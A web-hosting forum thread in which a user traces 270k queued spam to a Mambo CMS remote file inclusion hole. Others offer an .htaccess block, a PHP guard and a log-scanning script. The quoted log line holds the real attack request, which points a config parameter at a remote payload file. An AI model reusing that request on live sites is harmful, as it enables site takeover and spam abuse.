270k of spams in Mail Queue, HELP

ktizo (Verified User, joined Jan 5, 2006, 46 messages)
After some clients complained about mails being blocked, I checked the Mail Queue and was shocked to see 270k of spam.

I'm in the midst of clearing the queue but am wondering how I can track where and how the spam was injected.

Anyone with similar experience, please help.
 
Can you insert the headers of the messages here?
I would begin from them.

Regards
 
some form injection

I just found out from one of the site logs that it uses a Mambo CMS hole to post. How can I stop this? Can anyone help?

index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://in.geocities.com/dnate10/class.txt? HTTP/1.1" 200 22150 "http://domain.com//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://in.geocities.com/dnate10/class.txt?"
 
Get your customer to upgrade Joomla to their latest release (1.5.3 if I remember correctly). Besides that, you can block access by using rewriterules in .htaccess or block the requesting IP performing the GET request (if only 1). The latter will only be a temporary solution though.

I'd strongly advise to upgrade instead of building workarounds.
 
Thanks for that tip, but this version of Mambo has been heavily customised, so it's not possible to upgrade. I've blocked that IP under APF. Can you advise what the code looks like in .htaccess?

Thanks mucho.
 
Maybe something like:

Code:
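RewriteEngine On
# RewriteRule only sees the URL path, so the query string is matched with RewriteCond
RewriteCond %{QUERY_STRING} in\.geocities\.com/dnate10/class\.txt [NC]
RewriteRule ^ http://127.0.0.1/ [R=301,L]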

Though I'm not much of a rewrite specialist, heh.
 
Thanks so much, I'll leave the APF on for now, and I'll use your method when there are more IPs involved.

Thanks!
 
This won't save you from the numerous other vulnerabilities that you're gonna be facing, but it'll keep them from including text files that mail bomb you:
Code:
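// Stop when mosConfig_absolute_path is supplied in the URL and names a .txt file
if (isset($_GET['mosConfig_absolute_path']) && stristr((string) $_GET['mosConfig_absolute_path'], ".txt")) die();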
Insert that at the top of the index.php file for Mambo, under the "<?php" tag.
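
On the original question of tracking where the spam was injected: the following is an added example, not part of the thread, that scans Apache combined-format access-log lines for the pattern in the log excerpt above, a query parameter whose value is a remote URL. The sample lines, IP addresses and host names are constructed, and the function names are this example's own.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Combined log format: client IP, identity, user, [time], "METHOD target PROTO", status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+)[^"]*" (\d{3})')
# A parameter value that begins with a remote scheme is the inclusion attempt.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.I)

def remote_params(target):
    """Return [(name, value)] for query parameters whose value is a remote URL."""
    _, _, query = target.partition('?')
    hits = []
    for pair in query.split('&'):
        name, _, value = pair.partition('=')
        value = unquote(value)  # also catches http%3A%2F%2F... encodings
        if REMOTE_RE.match(value):
            hits.append((unquote(name), value))
    return hits

def scan(lines):
    """Return (findings, per-IP counter); each finding is (ip, param, value, status)."""
    findings, by_ip = [], Counter()
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, target, status = m.groups()
        for name, value in remote_params(target):
            findings.append((ip, name, value, status))
            by_ip[ip] += 1
    return findings, by_ip

# Constructed sample lines (documentation IP ranges and example hosts).
SAMPLE = [
    '203.0.113.7 - - [10/May/2008:03:14:07 +0000] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&GLOBALS=&mosConfig_absolute_path=http://remote.example/class.txt? HTTP/1.1" 200 22150',
    '203.0.113.7 - - [10/May/2008:03:14:09 +0000] "GET /index.php?mosConfig_absolute_path=http%3A%2F%2Fremote.example%2Fclass.txt HTTP/1.1" 404 310',
    '192.0.2.10 - - [10/May/2008:03:15:00 +0000] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 18022',
    '198.51.100.23 - - [10/May/2008:03:16:30 +0000] "GET /search.php?q=about+http://example.org HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    findings, by_ip = scan(SAMPLE)
    for finding in findings:
        print(finding)
    print(by_ip.most_common())
```

Hits with a 200 status are the ones to correlate with mail-queue timestamps first. Legitimate parameters that carry full URLs, such as return links, will also be flagged and need manual review.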
 